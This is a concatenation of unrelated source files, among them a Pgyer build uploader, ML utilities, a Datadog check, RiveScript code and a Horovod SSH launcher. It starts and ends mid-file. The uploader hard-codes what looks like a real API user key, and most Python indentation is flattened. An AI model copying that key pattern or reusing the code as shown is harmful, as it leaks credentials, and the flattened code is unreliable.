q = np.asarray(q, dtype=np.float).flatten()
        a = np.abs(1-np.dot(p,q.T)) # np.dot rather than elementwise * so the product reduces to a scalar
b = ((p-q)**2 + 2*a*(p*q)) * abs(p-q) / ((p+q)**2+np.finfo('float').eps)
return np.abs(np.sum(b))
class ChiSquareBRD(AbstractDistance):
"""
Calculates the ChiSquare-Bin Ratio Dissimilarity.
Literature:
"Use Bin-Ratio Information for Category and Scene Classification" (2010), Xie et.al.
"""
def __init__(self):
AbstractDistance.__init__(self,"ChiSquare-BinRatioDistance")
def __call__(self, p, q):
p = np.asarray(p, dtype=np.float).flatten()
q = np.asarray(q, dtype=np.float).flatten()
        a = np.abs(1-np.dot(p,q.T)) # np.dot rather than elementwise * so the product reduces to a scalar
b = ((p-q)**2 + 2*a*(p*q)) * (p-q)**2 / ((p+q)**3+np.finfo('float').eps)
return np.abs(np.sum(b))
|
pgyer_uploader.py | elina8013/android_demo | 666 | 9030 | <filename>pgyer_uploader.py
#!/usr/bin/python
#coding=utf-8
import os
import requests
import time
import re
from datetime import datetime
import urllib2
import json
import mimetypes
import smtplib
from email.MIMEText import MIMEText
from email.MIMEMultipart import MIMEMultipart
# configuration for pgyer
USER_KEY = "f605b7c7826690f796078e3dd23a60d5"
API_KEY = "<KEY>"
PGYER_UPLOAD_URL = "https://www.pgyer.com/apiv1/app/upload"
repo_path = 'C:/Users/Administrator/.jenkins/workspace/Demo/app'
repo_url = 'https://github.com/r17171709/iite_test'
ipa_path = "C:/Users/Administrator/.jenkins/workspace/Demo/app/build/outputs/apk/app-release.apk"
update_description = "版本更新测试"
def parseUploadResult(jsonResult):
print 'post response: %s' % jsonResult
resultCode = jsonResult['code']
send_Email(jsonResult)
if resultCode != 0:
print "Upload Fail!"
raise Exception("Reason: %s" % jsonResult['message'])
print "Upload Success"
appKey = jsonResult['data']['appKey']
appDownloadPageURL = "https://www.pgyer.com/%s" % appKey
print "appDownloadPage: %s" % appDownloadPageURL
return appDownloadPageURL
def uploadIpaToPgyer(ipaPath, updateDescription):
print "Begin to upload ipa to Pgyer: %s" % ipaPath
headers = {'enctype': 'multipart/form-data'}
payload = {
'uKey': USER_KEY,
'_api_key': API_KEY,
        'publishRange': '2', # publish immediately
        'isPublishToPublic': '2', # do not publish to the public square
        'updateDescription': updateDescription # release notes for this build
}
try_times = 0
while try_times < 5:
try:
print "uploading ... %s" % datetime.now()
ipa_file = {'file': open(ipaPath, 'rb')}
r = requests.post(PGYER_UPLOAD_URL,
headers = headers,
files = ipa_file,
data = payload
)
assert r.status_code == requests.codes.ok
result = r.json()
appDownloadPageURL = parseUploadResult(result)
return appDownloadPageURL
except requests.exceptions.ConnectionError:
print "requests.exceptions.ConnectionError occured!"
time.sleep(60)
print "try again ... %s" % datetime.now()
try_times += 1
except Exception as e:
print "Exception occured: %s" % str(e)
time.sleep(60)
print "try again ... %s" % datetime.now()
try_times += 1
if try_times >= 5:
raise Exception("Failed to upload ipa to Pgyer, retried 5 times.")
def parseQRCodeImageUrl(appDownloadPageURL):
try_times = 0
while try_times < 3:
try:
response = requests.get(appDownloadPageURL)
regex = '<img src=\"(.*?)\" style='
m = re.search(regex, response.content)
assert m is not None
appQRCodeURL = m.group(1)
print "appQRCodeURL: %s" % appQRCodeURL
return appQRCodeURL
except AssertionError:
try_times += 1
time.sleep(60)
print "Can not locate QRCode image. retry ... %s: %s" % (try_times, datetime.now())
if try_times >= 3:
raise Exception("Failed to locate QRCode image in download page, retried 3 times.")
def saveQRCodeImage(appDownloadPageURL, output_folder):
appQRCodeURL = parseQRCodeImageUrl(appDownloadPageURL)
response = requests.get(appQRCodeURL)
qr_image_file_path = os.path.join(output_folder, 'QRCode.png')
if response.status_code == 200:
with open(qr_image_file_path, 'wb') as f:
f.write(response.content)
print 'Save QRCode image to file: %s' % qr_image_file_path
def main():
appDownloadPageURL = uploadIpaToPgyer(ipa_path, update_description)
try:
output_folder = os.path.dirname(ipa_path)
saveQRCodeImage(appDownloadPageURL, output_folder)
except Exception as e:
print "Exception occured: %s" % str(e)
# Get the information of the most recent git commit
def getCommitInfo():
    # Option 1: use a Python git library (requires the current branch to exist on the remote)
    # repo = Gittle(repo_path, origin_uri=repo_url)
    # commitInfo = repo.commit_info(start=0, end=1)
    # lastCommitInfo = commitInfo[0]
    # Option 2: cd into the repo directory and print the last commit with `git log -1`
    os.chdir(repo_path)
    lastCommitInfo = run_cmd('git log -1')
    return lastCommitInfo
# Send the notification e-mail
def send_Email(json_result):
print '*******start to send mail****'
appName = json_result['data']['appName']
appKey = json_result['data']['appKey']
appVersion = json_result['data']['appVersion']
appBuildVersion = json_result['data']['appBuildVersion']
appShortcutUrl = json_result['data']['appShortcutUrl']
    # mail recipients
    mail_receiver = ['<EMAIL>']
    # configure host, user and password according to your mail provider
mail_host = 'smtp.139.com'
mail_port = 465
mail_user = '<EMAIL>'
mail_pwd = '<PASSWORD>'
mail_to = ','.join(mail_receiver)
msg = MIMEMultipart()
environsString = '<p><h3>本次打包相关信息</h3><p>'
# environsString += '<p>ipa 包下载地址 : ' + 'wudizhi' + '<p>'
environsString += '<p>蒲公英安装地址 : ' + 'http://www.pgyer.com/' + str(appShortcutUrl) + '<p><p><p><p>'
# environsString += '<li><a href="itms-services://?action=download-manifest&url=https://ssl.pgyer.com/app/plist/' + str(appKey) + '"></a>点击直接安装</li>'
environsString += '<p><h3>本次git提交相关信息</h3><p>'
    # fetch the latest git commit info
    lastCommitInfo = getCommitInfo()
    # # committer
    # committer = lastCommitInfo['committer']['raw']
    # # commit description
    # description = lastCommitInfo['description']
environsString += '<p>' + '<font color="red">' + lastCommitInfo + '</font>' + '<p>'
# environsString += '<p>Description:' + '<font color="red">' + description + '</font>' + '<p>'
message = environsString
body = MIMEText(message, _subtype='html', _charset='utf-8')
msg["Accept-Language"]="zh-CN"
msg["Accept-Charset"]="ISO-8859-1,utf-8"
msg.attach(body)
msg['To'] = mail_to
msg['from'] = '<EMAIL>'
msg['subject'] = 'Android APP 最新打包文件'
try:
s = smtplib.SMTP()
        # enable debug mode so the SMTP session prints progress output
s.set_debuglevel(1)
s.connect(mail_host)
        s.starttls()  # upgrade the connection to TLS encryption
s.login(mail_user, mail_pwd)
s.sendmail(mail_user, mail_receiver, msg.as_string())
s.close()
print '*******mail send ok****'
except Exception, e:
print e
def run_cmd(cmd):
try:
import subprocess
except ImportError:
_, result_f, error_f = os.popen3(cmd)
else:
process = subprocess.Popen(cmd, shell = True,
stdout = subprocess.PIPE, stderr = subprocess.PIPE)
result_f, error_f = process.stdout, process.stderr
errors = error_f.read()
if errors: pass
result_str = result_f.read().strip()
if result_f : result_f.close()
if error_f : error_f.close()
return result_str
if __name__ == '__main__':
main()
|
fastseg/model/utils.py | SeockHwa/Segmentation_mobileV3 | 274 | 9052 | <filename>fastseg/model/utils.py<gh_stars>100-1000
import torch.nn as nn
from .efficientnet import EfficientNet_B4, EfficientNet_B0
from .mobilenetv3 import MobileNetV3_Large, MobileNetV3_Small
def get_trunk(trunk_name):
"""Retrieve the pretrained network trunk and channel counts"""
if trunk_name == 'efficientnet_b4':
backbone = EfficientNet_B4(pretrained=True)
s2_ch = 24
s4_ch = 32
high_level_ch = 1792
elif trunk_name == 'efficientnet_b0':
backbone = EfficientNet_B0(pretrained=True)
s2_ch = 16
s4_ch = 24
high_level_ch = 1280
elif trunk_name == 'mobilenetv3_large':
backbone = MobileNetV3_Large(pretrained=True)
s2_ch = 16
s4_ch = 24
high_level_ch = 960
elif trunk_name == 'mobilenetv3_small':
backbone = MobileNetV3_Small(pretrained=True)
s2_ch = 16
s4_ch = 16
high_level_ch = 576
else:
raise ValueError('unknown backbone {}'.format(trunk_name))
return backbone, s2_ch, s4_ch, high_level_ch
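# Example (illustrative; pretrained weights are downloaded on first use):
#   backbone, s2_ch, s4_ch, high_level_ch = get_trunk('mobilenetv3_large')
#   # -> channel counts 16, 24 and 960, as listed above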
class ConvBnRelu(nn.Module):
"""Convenience layer combining a Conv2d, BatchNorm2d, and a ReLU activation.
Original source of this code comes from
https://github.com/lingtengqiu/Deeperlab-pytorch/blob/master/seg_opr/seg_oprs.py
"""
def __init__(self, in_planes, out_planes, kernel_size, stride=1, padding=0,
norm_layer=nn.BatchNorm2d):
super(ConvBnRelu, self).__init__()
self.conv = nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size,
stride=stride, padding=padding, bias=False)
self.bn = norm_layer(out_planes, eps=1e-5)
self.relu = nn.ReLU(inplace=True)
def forward(self, x):
x = self.conv(x)
x = self.bn(x)
x = self.relu(x)
return x
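# Illustrative shapes (assuming torch is imported alongside torch.nn):
#   block = ConvBnRelu(in_planes=3, out_planes=64, kernel_size=3, stride=2, padding=1)
#   y = block(torch.randn(1, 3, 224, 224))   # -> y.shape == (1, 64, 112, 112)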
|
cmsplugin_cascade/migrations/0007_add_proxy_models.py | teklager/djangocms-cascade | 139 | 9063 | from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('cmsplugin_cascade', '0006_bootstrapgallerypluginmodel'),
]
operations = [
]
|
theonionbox/tob/credits.py | ralphwetzel/theonionbox | 120 | 9064 | Credits = [
('Bootstrap', 'https://getbootstrap.com', 'The Bootstrap team', 'MIT'),
('Bottle', 'http://bottlepy.org', '<NAME>', 'MIT'),
('Cheroot', 'https://github.com/cherrypy/cheroot', 'CherryPy Team', 'BSD 3-Clause "New" or "Revised" License'),
('Click', 'https://github.com/pallets/click', 'Pallets', 'BSD 3-Clause "New" or "Revised" License'),
('ConfigUpdater', 'https://github.com/pyscaffold/configupdater', '<NAME>', 'MIT'),
('Glide', 'https://github.com/glidejs/glide', '@jedrzejchalubek', 'MIT'),
('JQuery', 'https://jquery.com', 'The jQuery Foundation', 'MIT'),
('jquery.pep.js', 'http://pep.briangonzalez.org', '@briangonzalez', 'MIT'),
('js-md5', 'https://github.com/emn178/js-md5', '@emn178', 'MIT'),
('PySocks', 'https://github.com/Anorov/PySocks', '@Anorov', 'Custom DAN HAIM'),
('RapydScript-NG', 'https://github.com/kovidgoyal/rapydscript-ng', '@kovidgoyal',
'BSD 2-Clause "Simplified" License'),
('Requests', 'https://requests.kennethreitz.org', '<NAME>', 'Apache License, Version 2.0'),
('scrollMonitor', 'https://github.com/stutrek/scrollmonitor', '@stutrek', 'MIT'),
('Smoothie Charts', 'https://github.com/joewalnes/smoothie', '@drewnoakes', 'MIT'),
('stem', 'https://stem.torproject.org', '<NAME> and The Tor Project', 'GNU LESSER GENERAL PUBLIC LICENSE')
]
|
pypeln/thread/api/to_iterable_thread_test.py | quarckster/pypeln | 1,281 | 9111 | <filename>pypeln/thread/api/to_iterable_thread_test.py
import typing as tp
from unittest import TestCase
import hypothesis as hp
from hypothesis import strategies as st
import pypeln as pl
import cytoolz as cz
MAX_EXAMPLES = 10
T = tp.TypeVar("T")
@hp.given(nums=st.lists(st.integers()))
@hp.settings(max_examples=MAX_EXAMPLES)
def test_from_to_iterable(nums: tp.List[int]):
nums_pl = nums
nums_pl = pl.thread.from_iterable(nums_pl)
nums_pl = cz.partition_all(10, nums_pl)
nums_pl = pl.thread.map(sum, nums_pl)
nums_pl = pl.thread.to_iterable(nums_pl)
nums_pl = list(nums_pl)
nums_py = nums
nums_py = cz.partition_all(10, nums_py)
nums_py = map(sum, nums_py)
nums_py = list(nums_py)
assert nums_py == nums_pl
|
pulsar/datadog_checks/pulsar/check.py | divyamamgai/integrations-extras | 158 | 9122 | <filename>pulsar/datadog_checks/pulsar/check.py
from datadog_checks.base import ConfigurationError, OpenMetricsBaseCheck
EVENT_TYPE = SOURCE_TYPE_NAME = 'pulsar'
class PulsarCheck(OpenMetricsBaseCheck):
"""
PulsarCheck derives from AgentCheck that provides the required check method
"""
def __init__(self, name, init_config, instances=None):
instance = instances[0]
url = instance.get('prometheus_url')
if url is None:
raise ConfigurationError("Unable to find prometheus_url in config file.")
self.NAMESPACE = 'kesque.pulsar'
self.metrics_mapper = {
'pulsar_consumer_available_permits': 'consumer.available_permits',
'pulsar_consumer_blocked_on_unacked_messages': 'consumer.blocked_on_unacked_messages',
'pulsar_consumer_msg_rate_out': 'consumer.msg_rate_out',
'pulsar_consumer_msg_rate_redeliver': 'consumer.msg_rate_redeliver',
'pulsar_consumer_msg_throughput_out': 'consumer.msg_throughput_out',
'pulsar_consumer_unacked_messages': 'consumer.unacked_messages',
'pulsar_consumers_count': 'consumers_count',
'pulsar_entry_size_count': 'entry_size_count',
'pulsar_entry_size_le_100_kb': 'entry_size_le_100_kb',
'pulsar_entry_size_le_128': 'entry_size_le_128',
'pulsar_entry_size_le_16_kb': 'entry_size_le_16_kb',
'pulsar_entry_size_le_1_kb': 'entry_size_le_1_kb',
'pulsar_entry_size_le_1_mb': 'entry_size_le_1_mb',
'pulsar_entry_size_le_2_kb': 'entry_size_le_2_kb',
'pulsar_entry_size_le_4_kb': 'entry_size_le_4_kb',
'pulsar_entry_size_le_512': 'entry_size_le_512',
'pulsar_entry_size_le_overflow': 'entry_size_le_overflow',
'pulsar_entry_size_sum': 'entry_size_sum',
'pulsar_in_bytes_total': 'in_bytes_total',
'pulsar_in_messages_total': 'in_messages_total',
'pulsar_msg_backlog': 'msg_backlog',
'pulsar_out_bytes_total': 'out_bytes_total',
'pulsar_out_messages_total': 'out_messages_total',
'pulsar_producers_count': 'producers_count',
'pulsar_rate_in': 'rate_in',
'pulsar_rate_out': 'rate_out',
'pulsar_replication_backlog': 'replication.backlog',
'pulsar_replication_rate_in': 'replication.rate_in',
'pulsar_replication_rate_out': 'replication.rate_out',
'pulsar_replication_throughput_in': 'replication.throughput_in',
'pulsar_replication_throughput_out': 'replication.throughput_out',
'pulsar_storage_backlog_quota_limit': 'storage.backlog_quota_limit',
'pulsar_storage_backlog_size': 'storage.backlog_size',
'pulsar_storage_read_rate': 'storage.read_rate',
'pulsar_storage_offloaded_size': 'storage.offloaded_size',
'pulsar_storage_size': 'storage.size',
'pulsar_storage_write_latency_count': 'storage.write_latency_count',
'pulsar_storage_write_latency_le_0_5': 'storage.write_latency_le_0_5',
'pulsar_storage_write_latency_le_1': 'storage.write_latency_le_1',
'pulsar_storage_write_latency_le_10': 'storage.write_latency_le_10',
'pulsar_storage_write_latency_le_100': 'storage.write_latency_le_100',
'pulsar_storage_write_latency_le_1000': 'storage.write_latency_le_1000',
'pulsar_storage_write_latency_le_20': 'storage.write_latency_le_20',
'pulsar_storage_write_latency_le_200': 'storage.write_latency_le_200',
'pulsar_storage_write_latency_le_5': 'storage.write_latency_le_5',
'pulsar_storage_write_latency_le_50': 'storage.write_latency_le_50',
'pulsar_storage_write_latency_overflow': 'storage.write_latency_overflow',
'pulsar_storage_write_latency_sum': 'storage.write_latency_sum',
'pulsar_storage_write_rate': 'storage.write_rate',
'pulsar_subscription_back_log': 'subscription.back_log',
'pulsar_subscription_back_log_no_delayed': 'subscription.back_log_no_delayed',
'pulsar_subscription_blocked_on_unacked_messages': 'subscription.blocked_on_unacked_messages',
'pulsar_subscription_delayed': 'subscription.delayed',
'pulsar_subscription_msg_rate_out': 'subscription.msg_rate_out',
'pulsar_subscription_msg_rate_redeliver': 'subscription.msg_rate_redeliver',
'pulsar_subscription_msg_throughput_out': 'subscription.msg_throughput_out',
'pulsar_subscription_unacked_messages': 'subscription.unacked_messages',
'pulsar_subscriptions_count': 'subscriptions.count',
'pulsar_throughput_in': 'throughput_in',
'pulsar_throughput_out': 'throughput_out',
'pulsar_topics_count': 'topics_count',
'scrape_duration_seconds': 'scrape_duration_seconds',
'scrape_samples_post_metric_relabeling': 'scrape_samples_post_metric_relabeling',
'scrape_samples_scraped': 'scrape_samples_scraped',
'topic_load_times': 'topic_load_times',
'topic_load_times_count': 'topic_load_times_count',
'topic_load_times_sum': 'topic_load_times_sum',
'up': 'broker.up',
}
instance.update(
{
'prometheus_url': url,
'namespace': self.NAMESPACE,
'metrics': [self.metrics_mapper],
'send_distribution_counts_as_monotonic': instance.get('send_distribution_counts_as_monotonic', True),
'send_distribution_sums_as_monotonic': instance.get('send_distribution_sums_as_monotonic', True),
}
)
super(PulsarCheck, self).__init__(name, init_config, instances)
|
evaluation/datasets/build_dataset_images.py | hsiehkl/pdffigures2 | 296 | 9127 | <filename>evaluation/datasets/build_dataset_images.py
import argparse
from os import listdir, mkdir
from os.path import join, isdir
from subprocess import call
import sys
import datasets
from shutil import which
"""
Script to use pdftoppm to turn the pdfs into single images per page
"""
def get_images(pdf_dir, output_dir, dpi, mono=True):
if which("pdftoppm") is None:
raise ValueError("Requires executable pdftopmm to be on the PATH")
if not isdir(output_dir):
print("Making %s to store rasterized PDF pages" % output_dir)
mkdir(output_dir)
if not isdir(pdf_dir):
raise ValueError(pdf_dir + " is not a directory")
pdf_doc_ids = [x.split(".pdf")[0] for x in listdir(pdf_dir)]
already_have = set()
for filename in listdir(output_dir):
if "-page" not in filename:
raise ValueError()
doc_id = filename.split("-page")[0]
if doc_id not in pdf_doc_ids:
raise ValueError("doc id %s in output dir not found in pdfs" % doc_id)
already_have.add(doc_id)
if len(already_have) != 0:
print("Already have %d docs" % len(already_have))
num_pdfs = len(listdir(pdf_dir))
for (i, pdfname) in enumerate(listdir(pdf_dir)):
if not pdfname.endswith(".pdf"):
raise ValueError()
doc_id = pdfname[:-4]
if doc_id in already_have:
continue
print("Creating images for pdf %s (%d / %d)" % (pdfname, i + 1, num_pdfs))
        if mono:
args = ["pdftoppm", "-gray", "-r", str(dpi),
"-aa", "no", "-aaVector", "no", "-cropbox",
join(pdf_dir, pdfname), join(output_dir, doc_id + "-page")]
else:
args = ["pdftoppm", "-jpeg", "-r", str(dpi), "-cropbox",
join(pdf_dir, pdfname), join(output_dir, doc_id + "-page")]
retcode = call(args)
if retcode != 0:
raise ValueError("Bad return code for <%s> (%d)", " ".join(args), retcode)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Cache rasterized page images for a dataset')
parser.add_argument("dataset", choices=datasets.DATASETS.keys(), help="target dataset")
parser.add_argument("color", choices=["gray", "color"], help="kind of images to render")
args = parser.parse_args()
dataset = datasets.get_dataset(args.dataset)
print("Running on dataset: " + dataset.name)
if args.color == "gray":
get_images(dataset.pdf_dir, dataset.page_images_gray_dir,
dataset.IMAGE_DPI, True)
elif args.color == "color":
get_images(dataset.pdf_dir, dataset.page_images_color_dir,
dataset.COLOR_IMAGE_DPI, False)
else:
exit(1)
|
python_packages_static/flopy/mf6/__init__.py | usgs/neversink_workflow | 351 | 9136 | <gh_stars>100-1000
# imports
from . import coordinates
from . import data
from .modflow import *
from . import utils
from .data import mfdatascalar, mfdatalist, mfdataarray
from .mfmodel import MFModel
from .mfbase import ExtFileAction
|
colbert/parameters.py | techthiyanes/ColBERT | 421 | 9150 | import torch
DEVICE = torch.device("cuda")
SAVED_CHECKPOINTS = [32*1000, 100*1000, 150*1000, 200*1000, 300*1000, 400*1000]
SAVED_CHECKPOINTS += [10*1000, 20*1000, 30*1000, 40*1000, 50*1000, 60*1000, 70*1000, 80*1000, 90*1000]
SAVED_CHECKPOINTS += [25*1000, 50*1000, 75*1000]
SAVED_CHECKPOINTS = set(SAVED_CHECKPOINTS)
|
venv/Lib/site-packages/rivescript/inheritance.py | Hazemcodes/GimmyBot | 154 | 9174 | # RiveScript-Python
#
# This code is released under the MIT License.
# See the "LICENSE" file for more information.
#
# https://www.rivescript.com/
def get_topic_triggers(rs, topic, thats, depth=0, inheritance=0, inherited=False):
"""Recursively scan a topic and return a list of all triggers.
Arguments:
rs (RiveScript): A reference to the parent RiveScript instance.
topic (str): The original topic name.
thats (bool): Are we getting triggers for 'previous' replies?
depth (int): Recursion step counter.
inheritance (int): The inheritance level counter, for topics that
inherit other topics.
inherited (bool): Whether the current topic is inherited by others.
Returns:
[]str: List of all triggers found.
"""
# Break if we're in too deep.
if depth > rs._depth:
rs._warn("Deep recursion while scanning topic inheritance")
# Keep in mind here that there is a difference between 'includes' and
# 'inherits' -- topics that inherit other topics are able to OVERRIDE
# triggers that appear in the inherited topic. This means that if the top
# topic has a trigger of simply '*', then NO triggers are capable of
# matching in ANY inherited topic, because even though * has the lowest
# priority, it has an automatic priority over all inherited topics.
#
# The getTopicTriggers method takes this into account. All topics that
# inherit other topics will have their triggers prefixed with a fictional
# {inherits} tag, which would start at {inherits=0} and increment if this
# topic has other inheriting topics. So we can use this tag to make sure
# topics that inherit things will have their triggers always be on top of
# the stack, from inherits=0 to inherits=n.
# Important info about the depth vs inheritance params to this function:
    # depth increments by 1 each time this function recursively calls itself.
# inheritance increments by 1 only when this topic inherits another
# topic.
#
# This way, '> topic alpha includes beta inherits gamma' will have this
# effect:
# alpha and beta's triggers are combined together into one matching
# pool, and then those triggers have higher matching priority than
# gamma's.
#
# The inherited option is True if this is a recursive call, from a topic
# that inherits other topics. This forces the {inherits} tag to be added
# to the triggers. This only applies when the top topic 'includes'
# another topic.
rs._say("\tCollecting trigger list for topic " + topic + "(depth="
+ str(depth) + "; inheritance=" + str(inheritance) + "; "
+ "inherited=" + str(inherited) + ")")
# topic: the name of the topic
# depth: starts at 0 and ++'s with each recursion
# Topic doesn't exist?
if not topic in rs._topics:
rs._warn("Inherited or included topic {} doesn't exist or has no triggers".format(
topic
))
return []
# Collect an array of triggers to return.
triggers = []
# Get those that exist in this topic directly.
inThisTopic = []
if not thats:
# The non-that structure is {topic}->[array of triggers]
if topic in rs._topics:
for trigger in rs._topics[topic]:
inThisTopic.append([ trigger["trigger"], trigger ])
else:
# The 'that' structure is: {topic}->{cur trig}->{prev trig}->{trig info}
if topic in rs._thats.keys():
for curtrig in rs._thats[topic].keys():
for previous, pointer in rs._thats[topic][curtrig].items():
inThisTopic.append([ pointer["trigger"], pointer ])
# Does this topic include others?
if topic in rs._includes:
# Check every included topic.
for includes in rs._includes[topic]:
rs._say("\t\tTopic " + topic + " includes " + includes)
triggers.extend(get_topic_triggers(rs, includes, thats, (depth + 1), inheritance, True))
# Does this topic inherit others?
if topic in rs._lineage:
# Check every inherited topic.
for inherits in rs._lineage[topic]:
rs._say("\t\tTopic " + topic + " inherits " + inherits)
triggers.extend(get_topic_triggers(rs, inherits, thats, (depth + 1), (inheritance + 1), False))
# Collect the triggers for *this* topic. If this topic inherits any
# other topics, it means that this topic's triggers have higher
# priority than those in any inherited topics. Enforce this with an
# {inherits} tag.
if topic in rs._lineage or inherited:
for trigger in inThisTopic:
rs._say("\t\tPrefixing trigger with {inherits=" + str(inheritance) + "}" + trigger[0])
triggers.append(["{inherits=" + str(inheritance) + "}" + trigger[0], trigger[1]])
else:
triggers.extend(inThisTopic)
return triggers
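# Illustrative outcome (hypothetical data): for "> topic alpha includes beta
# inherits gamma" described above, alpha's and beta's triggers come back with a
# fictional prefix such as "{inherits=0}hello *", while gamma's stay unprefixed,
# so the caller's sorting keeps the inheriting topics' triggers on top.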
def get_topic_tree(rs, topic, depth=0):
"""Given one topic, get the list of all included/inherited topics.
:param str topic: The topic to start the search at.
:param int depth: The recursion depth counter.
:return []str: Array of topics.
"""
# Break if we're in too deep.
if depth > rs._depth:
rs._warn("Deep recursion while scanning topic trees!")
return []
# Collect an array of all topics.
topics = [topic]
# Does this topic include others?
if topic in rs._includes:
# Try each of these.
for includes in sorted(rs._includes[topic]):
topics.extend(get_topic_tree(rs, includes, depth + 1))
# Does this topic inherit others?
if topic in rs._lineage:
# Try each of these.
for inherits in sorted(rs._lineage[topic]):
topics.extend(get_topic_tree(rs, inherits, depth + 1))
return topics
|
training/horovod/base/horovod_wrapper.py | thehardikv/ai-platform-samples | 418 | 9194 | <reponame>thehardikv/ai-platform-samples
import collections
import datetime
import json
import multiprocessing
import os
import subprocess
import sys
import time
_SSHD_BINARY_PATH = "/usr/sbin/sshd"
EnvironmentConfig = collections.namedtuple(
"EnvironmentConfig",
["hosts", "port", "is_chief", "pools", "job_id"])
class DeadlineExceededError(Exception):
"""Indicates an action took too long."""
pass
def _sub_process_num_gpus(unused):
del unused
# This is imported here so that we don't load tensorflow in the parent
# process. Once the sub-process exits, it releases its allocated GPU memory.
from tensorflow.python.client import device_lib
local_device_protos = device_lib.list_local_devices()
gpus = [x.name for x in local_device_protos if x.device_type == "GPU"]
return len(gpus)
def _get_available_gpus():
"""Returns the number of GPUs on the machine."""
pool = multiprocessing.Pool(1)
result = pool.map(_sub_process_num_gpus, [None])[0]
pool.close()
pool.join()
return result
def parse_environment_config(env_config_str, job_id):
"""Parses environment config and returns a list of hosts as well as the role.
Returns:
An EnvironmentConfig.
"""
if env_config_str:
ssh_port = -1
env_config_json = json.loads(env_config_str)
cluster = env_config_json.get("cluster")
if not cluster:
return None, True
hosts = []
pools = collections.defaultdict(list)
for pool_type, tasks_per_type in cluster.items():
if pool_type == "master":
pool_type = "chief"
for host_and_port in tasks_per_type:
host, port = host_and_port.split(":")
if host == "127.0.0.1":
host = "localhost"
port = int(port)
if ssh_port == -1:
ssh_port = port
elif ssh_port != port:
raise ValueError("Inconsistent ssh ports across tasks %d != %d." %
(ssh_port, port))
hosts.append(host)
pools[pool_type].append(host)
is_chief = False
has_chief = "chief" in pools
if (env_config_json["task"]["type"] == "master" or
env_config_json["task"]["type"] == "chief"):
is_chief = True
if int(env_config_json["task"]["index"]) != 0:
raise ValueError("Only one master node is expected.")
elif ((not has_chief) and
(env_config_json["task"]["type"] == "worker") and
int(env_config_json["task"]["index"]) == 0):
is_chief = True
pools["chief"].append(pools["worker"].pop(0))
elif env_config_json["task"]["type"] != "worker":
raise ValueError("Unexpected task type for Horovod training: %s." %
env_config_json["task"]["type"])
return EnvironmentConfig(hosts=hosts, port=port, is_chief=is_chief,
pools=pools, job_id=job_id)
else:
return EnvironmentConfig(hosts=["localhost"], port=2222, is_chief=True,
pools={"chief": ["localhost"]}, job_id=job_id)
def start_ssh_server(port, is_chief):
ssh_server_command = [_SSHD_BINARY_PATH, "-p", str(port)]
if not is_chief:
ssh_server_command.append("-D")
completed = subprocess.call(ssh_server_command)
if completed != 0:
raise OSError("SSH server did not start successfully.")
def wait_for_ssh_servers(hosts, port, timeout_seconds):
deadline_datetime = datetime.datetime.utcnow() + datetime.timedelta(
seconds=timeout_seconds)
unavailable_hosts = []
while datetime.datetime.utcnow() < deadline_datetime:
unavailable_hosts = []
for host in hosts:
ssh_command = ["ssh", "-q", host, "-p", str(port), "true"]
result = subprocess.call(ssh_command)
if result != 0:
unavailable_hosts.append(host)
if not unavailable_hosts:
return
# Retry in 1 second.
time.sleep(1)
raise DeadlineExceededError(
"Timed out while waiting for all hosts to start. "
"Hosts still not available: %s. TASK_STARTUP_TIMEOUT_SECONDS=%d" %
(unavailable_hosts, timeout_seconds))
def run_horovod(env_config, jobs_per_host, args):
env = dict(os.environ)
del env["TF_CONFIG"]
num_jobs = len(env_config.hosts) * jobs_per_host
hosts = ",".join("%s:%d" % (h, jobs_per_host) for h in env_config.hosts)
horovod_command = [
"horovodrun", "--ssh-port", str(env_config.port), "-H",
hosts, "--num-proc", str(num_jobs)
]
horovod_command.extend(args)
exit_code = subprocess.call(horovod_command, env=env)
return exit_code
def benchmark_network(env_config):
if not env_config.pools["worker"]:
raise ValueError("No workers in the pool to do network benchmarking.")
iperf_server = ["iperf", "-s", "-p", "6000"]
server = subprocess.Popen(iperf_server)
# Wait 10 seconds for the local server to start.
time.sleep(10)
iperf_command = ["ssh", "-q", env_config.pools["worker"][0], "-p",
str(env_config.port),
"iperf", "-p", "6000", "-c", env_config.pools["chief"][0]]
subprocess.call(iperf_command)
server.kill()
def copy_files_recursively(src, dest):
if not dest.startswith("gs://"):
try:
os.makedirs(dest)
except OSError:
pass
copy_cmd = ["gsutil", "-m", "rsync", "-r", src, dest]
exit_code = subprocess.call(copy_cmd)
if exit_code != 0:
raise RuntimeError("Error while copying %s to %s" % (src, dest))
return exit_code
def main():
env_config_str = os.environ.get("TF_CONFIG")
job_id = os.environ.get("CLOUD_ML_JOB_ID", "localrun")
env_config = parse_environment_config(env_config_str, job_id)
print (env_config, env_config.pools, env_config.hosts, os.environ)
if os.environ.get("STAGE_GCS_PATH", False):
copy_files_recursively(
os.environ.get("STAGE_GCS_PATH"),
os.environ.get("STAGING_DIR", "/input"))
start_ssh_server(env_config.port, env_config.is_chief)
max_num_retries = os.environ.get("NUM_HOROVOD_RETRIES", 1)
if env_config.is_chief:
exit_code = 0
for retry in range(max_num_retries):
staging_timeout_seconds = int(
os.environ.get("TASK_STARTUP_TIMEOUT_SECONDS", 600))
wait_for_ssh_servers(env_config.hosts, env_config.port,
staging_timeout_seconds)
if os.environ.get("BENCHMARK_NETWORK", False):
benchmark_network(env_config)
num_gpus = _get_available_gpus()
# If there are no GPUs, we can just run single process per machine.
jobs_per_host = max(1, num_gpus)
args = sys.argv[1:]
exit_code = run_horovod(env_config=env_config, jobs_per_host=jobs_per_host,
args=args)
if exit_code == 0:
break
else:
print ("Retrying...", retry, "out of", max_num_retries)
if os.environ.get("GCS_OUTPUT_PATH", False):
copy_files_recursively(
os.environ.get("OUTPUT_DIR", "/output"),
os.path.join(os.environ.get("GCS_OUTPUT_PATH"), job_id))
sys.exit(exit_code)
if __name__ == "__main__":
main()
|
usr/callbacks/action/tools.py | uwitec/LEHome | 151 | 9206 | #!/usr/bin/env python
# encoding: utf-8
from __future__ import division
from decimal import Decimal
import subprocess
import threading
import urllib2
import urllib
import httplib
import json
import re
import hashlib
import base64
# import zlib
from lib.command.runtime import UserInput
from lib.helper.CameraHelper import CameraHelper
from lib.sound import Sound
from util import Util
from util.Res import Res
from util.log import *
from lib.model import Callback
class timer_callback(Callback.Callback):
def callback(self, cmd, action, target, msg):
if msg is None:
self._home.publish_msg(cmd, u"时间格式错误")
return False, None
if msg.endswith(u'点') or \
msg.endswith(u'分'):
t = Util.gap_for_timestring(msg)
